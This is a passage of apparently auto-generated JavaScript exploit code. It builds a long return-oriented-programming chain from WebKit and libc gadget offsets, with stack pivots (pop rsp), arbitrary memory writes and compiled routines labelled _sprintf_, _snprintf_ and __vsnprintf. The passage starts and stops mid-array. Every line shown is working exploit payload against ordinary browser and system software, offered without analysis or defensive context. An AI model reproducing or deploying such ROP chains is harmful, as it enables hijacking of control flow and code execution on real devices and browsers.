webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+555792, //L12316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12315:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12316:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12317:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12318:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+555904, //L12319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+555920, //L12320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12319:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12320:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+556032, //L12321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+556064, //L12323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+556048, //L12322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12321:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12322:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12323:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+556168, //L12324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+556184, //L12325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12324:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12325:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+556304, //L12326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+556288, //L12327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12327:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12326:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+556392, //L12329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+556376, //L12328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12328:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12329:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+556496, //L12330
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+556512, //L12331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12330:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12331:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+556632, //L12332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+556616, //L12333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12333:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12332:
db([0, 0]); // 0x0
//_sprintf_:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+556704, //L12335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12335:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+556768, //L12337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12337:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([16, 0]); // 0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+556856, //L12339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12338:
db([24, 0]); // 0x18
set_gadget(libc_base+759608,); //pop rax
//L12339:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+556912, //L12340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12340:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12342:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12343:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12345:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+557088, //L12348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+557072, //L12346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12346:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12348:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+557232, //L12351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+557200, //L12349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+557216, //L12350
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12349:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12350:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12351:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+557312, //L12352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12352:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12354:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+557432, //L12357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+557416, //L12355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12355:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12357:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+557576, //L12360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+557544, //L12358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+557560, //L12359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12358:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12359:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12360:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12361:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12362:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L12363:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+557848, //L12365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+557864, //L12366
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+557832, //L12364
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12364:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12365:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12366:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+557960, //L12368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+557944, //L12367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12367:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12368:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+558040, //L12369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12369:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12371:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+558160, //L12374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+558144, //L12372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12372:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12374:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+558304, //L12377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+558272, //L12375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+558288, //L12376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12375:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12376:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12377:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12378:
ropchain+161664, //__out_buffer
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12380:
ropchain+558456, //L12379
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+317712, //__vsnprintf
//L12379:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+558528, //L12381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12381:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12383:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L12385:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+558688, //L12388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+558672, //L12386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12386:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12388:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+558864, //L12391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+558880, //L12392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+558832, //L12389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+558848, //L12390
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12389:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12390:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12391:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12392:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+558960, //L12393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+558976, //L12394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12393:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12394:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+559088, //L12395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+559120, //L12397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+559104, //L12396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12395:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12396:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12397:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+559224, //L12398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+559240, //L12399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12398:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12399:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+559360, //L12400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+559344, //L12401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12401:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12400:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+559448, //L12403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+559432, //L12402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12402:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12403:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+559552, //L12404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+559568, //L12405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12404:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12405:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+559688, //L12406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+559672, //L12407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12407:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12406:
db([0, 0]); // 0x0
//_snprintf_:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+559760, //L12409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12409:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+559824, //L12411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12411:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([16, 0]); // 0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+559912, //L12413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12412:
db([32, 0]); // 0x20
set_gadget(libc_base+759608,); //pop rax
//L12413:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+559968, //L12414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12414:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12416:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12417:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12419:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+560144, //L12422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+560128, //L12420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12420:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12422:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+560288, //L12425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+560256, //L12423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+560272, //L12424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12423:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12424:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12425:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+560368, //L12426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12426:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12428:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+560488, //L12431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+560472, //L12429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12429:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12431:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+560632, //L12434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+560600, //L12432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+560616, //L12433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12432:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12433:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12434:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+560712, //L12435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12435:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12437:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+560832, //L12440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+560816, //L12438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12438:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12440:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+560976, //L12443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+560944, //L12441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+560960, //L12442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12441:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12442:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12443:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+561056, //L12444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12444:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12446:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+561176, //L12449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+561160, //L12447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12447:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12449:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+561320, //L12452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+561288, //L12450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+561304, //L12451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12450:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12451:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12452:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12453:
ropchain+161664, //__out_buffer
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12455:
ropchain+561472, //L12454
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+317712, //__vsnprintf
//L12454:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+561544, //L12456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12456:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12458:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L12460:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+561704, //L12463
